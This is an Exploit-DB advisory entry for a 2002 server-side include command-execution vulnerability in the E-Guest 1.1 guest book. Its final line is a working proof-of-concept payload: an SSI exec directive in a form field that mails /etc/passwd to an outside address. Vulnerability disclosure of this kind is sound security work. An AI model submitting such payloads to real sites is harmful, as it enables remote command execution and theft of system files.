E-Guest 1.1 Server Side Include Arbitrary Command Execution Vulnerability

2002-06-30T00:00:00
ID EDB-ID:21586
Type exploitdb
Reporter DownBload
Modified 2002-06-30T00:00:00

Description

E-Guest 1.1 Server Side Include Arbitrary Command Execution Vulnerability. CVE-2002-2376. Remote exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/5129/info

E-Guest guest book is a freely available, open source guest book. It is designed for Unix and Linux operating systems.

E-Guest does not adequately sanitize user-supplied input in guest book entries. Because of this, it is possible to pass along commands via server-side includes that could allow a remote user to execute commands on the local host.

Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->